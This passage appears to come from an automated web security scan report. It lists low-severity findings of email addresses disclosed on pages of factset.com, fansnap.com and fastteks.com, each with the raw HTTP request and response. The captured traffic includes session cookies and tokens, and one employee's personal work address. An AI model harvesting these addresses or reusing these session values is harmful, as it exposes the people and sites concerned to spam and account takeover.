Path:   /files/jquery/nifty/niftycube.js

Issue detail

The following email address was disclosed in the response:

Request

GET /files/jquery/nifty/niftycube.js HTTP/1.1
Host: www.factset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:26:25 GMT
Server: Apache
Last-Modified: Thu, 27 Apr 2006 13:04:30 GMT
ETag: "14906-22c3-412693a8c9380"
Accept-Ranges: bytes
Content-Length: 8899
Connection: close
Content-Type: application/x-javascript

/* Nifty Corners Cube - rounded corners with CSS and Javascript
Copyright 2006 Alessandro Fulciniti (a.fulciniti@html.it)

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the Li
...[SNIP]...

23.44. http://www.factset.com/images/searchInputBg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.factset.com
Path:   /images/searchInputBg.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /images/searchInputBg.gif HTTP/1.1
Host: www.factset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/portal_css/Plone%20Default/ploneStyles0867.css
Cookie: __utma=70632967.167886563.1311085595.1311085595.1311085595.1; __utmb=70632967; __utmc=70632967; __utmz=70632967.1311085595.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 14:26:29 GMT
Bobo-Exception-Line: 646
Content-Length: 57208
Bobo-Exception-Value: See the server error log for details
Content-Language: en
Bobo-Exception-File: HTTPResponse.py
Bobo-Exception-Type: NotFound
Vary: Accept-Encoding
X-Cache-Rules-Applied: yes
Content-Type: text/html;charset=utf-8
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
   
           <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"

...[SNIP]...
nction(){$(this).html(supportPhone)})});$(document).ready(function(){$(".phone").each(function(){$(this).html(supportPhone)})})}
SupportNumberDataArray.push(new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com"));defaultSupportNumber=new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com");SupportNumberDataArray.push(new SupportNumber("GB","0800.169.5954","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AU","1800.33.28.33","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BE","080094108","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BR","0800 8917850","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DK","8060 1698","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("FR","0800.484.414","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DE","0800.200.0320","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("HK","3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IN","000.800.440.1703","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IT","800.510.858","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("JP","0120.779.465","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("MX","+1.888.542.9899","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SY,LB,PS,JO,IQ,IR,SA,KW,BH,QA,AE,OM,YE,EG","+44.(0)20.7374.4445","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NL","0800.228.8024","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NO","800.30365","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IE","1800.409.937","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SG","800.61.61.724","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ES","900.811.921","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ZA","0800 166 509","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("KR","080.411.0880","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SE","0200.110.263","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CH","0800.881.720","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AE","80004440014","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CN,IN,MY,LK,TW","+852.3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AT,BG,CY,CZ,DK,EE,FI,GR,HU,IS,LV,LT,LU,MT,PL,PT,RO,SK,SI,RU,TR,HR,BA,GE,AM,MK,MONTENEGRO,CS","+44.(0)20.7374.4445","support@factset.com"));

/* - promoItems_var.js - */
// http://www.factset.com/portal_javascripts/promoItems_var.js?original=1
var promoImages=new Array();var HomePagePromoArray=new Array();
function HomePagePromo(title,
...[SNIP]...

23.45. http://www.factset.com/products/im  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.factset.com
Path:   /products/im

Issue detail

The following email address was disclosed in the response:

Request

GET /products/im HTTP/1.1
Host: www.factset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/
Cookie: __utma=70632967.167886563.1311085595.1311085595.1311085595.1; __utmb=70632967; __utmc=70632967; __utmz=70632967.1311085595.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; _ZopeId="43061235A4.KYnvGzao"

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:26:33 GMT
Content-Length: 76057
Content-Language: en
Expires: Sat, 21 Jul 2001 14:00:36 GMT
Vary: Accept-Encoding,Accept-Language
Last-Modified: Wed, 08 Jun 2011 18:33:34 GMT
X-Cache-Rules-Applied: yes
Cache-Control: max-age=0, s-maxage=1800, must-revalidate
Content-Type: text/html;charset=utf-8
X-Header-Set-Id: cache-in-proxy-30-minutes
Age: 1557
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
   
           <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"

...[SNIP]...
nction(){$(this).html(supportPhone)})});$(document).ready(function(){$(".phone").each(function(){$(this).html(supportPhone)})})}
SupportNumberDataArray.push(new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com"));defaultSupportNumber=new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com");SupportNumberDataArray.push(new SupportNumber("GB","0800.169.5954","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AU","1800.33.28.33","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BE","080094108","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BR","0800 8917850","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DK","8060 1698","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("FR","0800.484.414","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DE","0800.200.0320","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("HK","3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IN","000.800.440.1703","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IT","800.510.858","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("JP","0120.779.465","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("MX","+1.888.542.9899","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SY,LB,PS,JO,IQ,IR,SA,KW,BH,QA,AE,OM,YE,EG","+44.(0)20.7374.4445","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NL","0800.228.8024","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NO","800.30365","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IE","1800.409.937","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SG","800.61.61.724","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ES","900.811.921","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ZA","0800 166 509","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("KR","080.411.0880","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SE","0200.110.263","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CH","0800.881.720","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AE","80004440014","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CN,IN,MY,LK,TW","+852.3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AT,BG,CY,CZ,DK,EE,FI,GR,HU,IS,LV,LT,LU,MT,PL,PT,RO,SK,SI,RU,TR,HR,BA,GE,AM,MK,MONTENEGRO,CS","+44.(0)20.7374.4445","support@factset.com"));

/* - promoItems_var.js - */
// http://www.factset.com/portal_javascripts/promoItems_var.js?original=1
var promoImages=new Array();var HomePagePromoArray=new Array();
function HomePagePromo(title,
...[SNIP]...

23.46. http://www.factset.com/products/im/img/im/title_1_2.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.factset.com
Path:   /products/im/img/im/title_1_2.png

Issue detail

The following email address was disclosed in the response:

Request

GET /products/im/img/im/title_1_2.png HTTP/1.1
Host: www.factset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/products/im
Cookie: __utma=70632967.167886563.1311085595.1311085595.1311085595.1; __utmb=70632967; __utmc=70632967; __utmz=70632967.1311085595.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; _ZopeId="43061235A4.KYnvGzao"

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 14:26:36 GMT
Bobo-Exception-Line: 646
Content-Length: 61418
Bobo-Exception-Value: See the server error log for details
Content-Language: en
Bobo-Exception-File: HTTPResponse.py
Bobo-Exception-Type: NotFound
Vary: Accept-Encoding
X-Cache-Rules-Applied: yes
Content-Type: text/html;charset=utf-8
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
   
           <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"

...[SNIP]...
nction(){$(this).html(supportPhone)})});$(document).ready(function(){$(".phone").each(function(){$(this).html(supportPhone)})})}
SupportNumberDataArray.push(new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com"));defaultSupportNumber=new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com");SupportNumberDataArray.push(new SupportNumber("GB","0800.169.5954","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AU","1800.33.28.33","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BE","080094108","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BR","0800 8917850","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DK","8060 1698","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("FR","0800.484.414","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DE","0800.200.0320","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("HK","3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IN","000.800.440.1703","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IT","800.510.858","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("JP","0120.779.465","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("MX","+1.888.542.9899","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SY,LB,PS,JO,IQ,IR,SA,KW,BH,QA,AE,OM,YE,EG","+44.(0)20.7374.4445","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NL","0800.228.8024","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NO","800.30365","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IE","1800.409.937","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SG","800.61.61.724","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ES","900.811.921","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ZA","0800 166 509","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("KR","080.411.0880","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SE","0200.110.263","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CH","0800.881.720","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AE","80004440014","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CN,IN,MY,LK,TW","+852.3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AT,BG,CY,CZ,DK,EE,FI,GR,HU,IS,LV,LT,LU,MT,PL,PT,RO,SK,SI,RU,TR,HR,BA,GE,AM,MK,MONTENEGRO,CS","+44.(0)20.7374.4445","support@factset.com"));

/* - promoItems_var.js - */
// http://www.factset.com/portal_javascripts/promoItems_var.js?original=1
var promoImages=new Array();var HomePagePromoArray=new Array();
function HomePagePromo(title,
...[SNIP]...

23.47. http://www.factset.com/products/privateequity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.factset.com
Path:   /products/privateequity

Issue detail

The following email address was disclosed in the response:

Request

GET /products/privateequity HTTP/1.1
Host: www.factset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/products/im
Cookie: __utma=70632967.167886563.1311085595.1311085595.1311085595.1; __utmb=70632967; __utmc=70632967; __utmz=70632967.1311085595.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; _ZopeId="43061235A4.KYnvGzao"; __switchTo5x=61; __unam=301c176-13142cac1d6-364e5fca-1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:26:48 GMT
Content-Length: 71606
Content-Language: en
Expires: Sat, 21 Jul 2001 14:26:47 GMT
Vary: Accept-Encoding,Accept-Language
Last-Modified: Thu, 23 Jun 2011 17:38:48 GMT
X-Cache-Rules-Applied: yes
Cache-Control: max-age=0, s-maxage=1800, must-revalidate
Content-Type: text/html;charset=utf-8
X-Header-Set-Id: cache-in-proxy-30-minutes
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
   
           <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"

...[SNIP]...
nction(){$(this).html(supportPhone)})});$(document).ready(function(){$(".phone").each(function(){$(this).html(supportPhone)})})}
SupportNumberDataArray.push(new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com"));defaultSupportNumber=new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com");SupportNumberDataArray.push(new SupportNumber("GB","0800.169.5954","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AU","1800.33.28.33","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BE","080094108","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BR","0800 8917850","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DK","8060 1698","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("FR","0800.484.414","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DE","0800.200.0320","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("HK","3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IN","000.800.440.1703","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IT","800.510.858","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("JP","0120.779.465","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("MX","+1.888.542.9899","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SY,LB,PS,JO,IQ,IR,SA,KW,BH,QA,AE,OM,YE,EG","+44.(0)20.7374.4445","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NL","0800.228.8024","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NO","800.30365","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IE","1800.409.937","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SG","800.61.61.724","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ES","900.811.921","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ZA","0800 166 509","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("KR","080.411.0880","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SE","0200.110.263","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CH","0800.881.720","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AE","80004440014","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CN,IN,MY,LK,TW","+852.3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AT,BG,CY,CZ,DK,EE,FI,GR,HU,IS,LV,LT,LU,MT,PL,PT,RO,SK,SI,RU,TR,HR,BA,GE,AM,MK,MONTENEGRO,CS","+44.(0)20.7374.4445","support@factset.com"));

/* - promoItems_var.js - */
// http://www.factset.com/portal_javascripts/promoItems_var.js?original=1
var promoImages=new Array();var HomePagePromoArray=new Array();
function HomePagePromo(title,
...[SNIP]...

23.48. http://www.fansnap.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fansnap.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.fansnap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:43:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 115
ETag: "d77c6a4a9298bbbbdb807bc3ffe96fee"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: tvid=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: vid=1342567440282625; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:43:36 GMT
Set-Cookie: lvd=1311101016; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:43:36 GMT
Set-Cookie: _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoIbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUALOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNctobgH7tQ64GOgtvZmZzZXRp%2FpCdOg12aXNpdF9pZGkEKF1kHzoPdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToOc3R5bGVfaWRzSSIABjsIRg%3D%3D--7382d0abaaf72a07ec28bc0ebd8430ba3e768e1a; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 41554
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
$(function(){
bindRecentSearchesSettings();
bindRecentSearchesHandlers('fansnap.com', fsTop.channel);
$('#gen_email').example("you@example.com");

var emailSubscription = new EmailSubscription({
formDomId: 'mailing-list-form',
emailDomId: 'gen_email',
entityType: null,
entityId: null,
marketAreaId: 13,

...[SNIP]...

23.49. http://www.fansnap.com/developers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fansnap.com
Path:   /developers

Issue detail

The following email addresses were disclosed in the response:

Request

GET /developers HTTP/1.1
Host: www.fansnap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fansnap.com/about
Cookie: ver=1; vid=1342567440282625; tvid=1342567440282625; _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoIbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUALOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNctobgL58u68GOgtvZmZzZXRp%2FpCdOg12aXNpdF9pZGkEKF1kHzoPdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToOc3R5bGVfaWRzSSIABjsIRg%3D%3D--5b44033c581130d6faa8811aaffe669fa3974944; POOLID=B; __utma=19633071.1263508421.1311101027.1311101027.1311101027.1; __utmb=19633071; __utmc=19633071; __utmz=19633071.1311101027.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; lvd=1311101038

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:44:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 14
ETag: "bfa7ab1f3b81c2b865b63d6a30d3b74a"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoIbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUALOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNctobgE5q87AGOgtvZmZzZXRp%2FpCdOg12aXNpdF9pZGkEKF1kHzoPdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToOc3R5bGVfaWRzSSIABjsIRg%3D%3D--d9a3777cedf14b19a925974c0f762f2ddc6ee6dd; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 12059
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<a href="mailto:developers@fansnap.com">developers@fansnap.com</a>
...[SNIP]...
<![CDATA[
$(function(){
$('#gen_email').example("you@example.com");

var emailSubscription = new EmailSubscription({
formDomId: 'mailing-list-form',
emailDomId: 'gen_email',
entityType: null,
entityId: null,
marketAreaId: 13,

...[SNIP]...

23.50. http://www.fastteks.com/TechSolutions/About-Us.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fastteks.com
Path:   /TechSolutions/About-Us.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /TechSolutions/About-Us.aspx HTTP/1.1
Host: www.fastteks.com
Proxy-Connection: keep-alive
Referer: http://www.fastteks.com/TechSolutions/Contact-Us.aspx?id=443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-jgcdejoi=6580DFD6651FCAA5171157C96E4BB448; .ASPXANONYMOUS=_eAUs758zAEkAAAANjdjMWRjYjktMWFjYy00MTAxLThkNzItMjgxMzBiMTMwNGUw8ijUH0Cv7Pat0Vj-1z-ShfMdhM01; ASP.NET_SessionId=2exsmk55wscz5545na1jov45; __utma=226585354.596719106.1311091190.1311091190.1311091190.1; __utmb=226585354.2.10.1311091190; __utmc=226585354; __utmz=226585354.1311091190.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 16:01:18 GMT
Server: Microsoft-IIS/7.5
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 363232


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="X-UA
...[SNIP]...
<!--
Web Design and Programming by 352 Media Group..
422 SW 140th Terrace
Newberry, Fl 32669
(877) 352-Media
sales@352media.com
www.352media.com
-->
...[SNIP]...
<a href="mailto:mandersen@fastteks.com">mandersen@fastteks.com</a>
...[SNIP]...

23.51. http://www.fastteks.com/TechSolutions/Contact-Us.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fastteks.com
Path:   /TechSolutions/Contact-Us.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /TechSolutions/Contact-Us.aspx?id=443 HTTP/1.1
Host: www.fastteks.com
Proxy-Connection: keep-alive
Referer: http://www.fastteks.com/TechSolutions/Services.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-jgcdejoi=6580DFD6651FCAA5171157C96E4BB448; .ASPXANONYMOUS=_eAUs758zAEkAAAANjdjMWRjYjktMWFjYy00MTAxLThkNzItMjgxMzBiMTMwNGUw8ijUH0Cv7Pat0Vj-1z-ShfMdhM01; ASP.NET_SessionId=2exsmk55wscz5545na1jov45; __utma=226585354.596719106.1311091190.1311091190.1311091190.1; __utmb=226585354.2.10.1311091190; __utmc=226585354; __utmz=226585354.1311091190.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 16:00:43 GMT
Server: Microsoft-IIS/7.5
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 125293


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="X-UA
...[SNIP]...
<!--
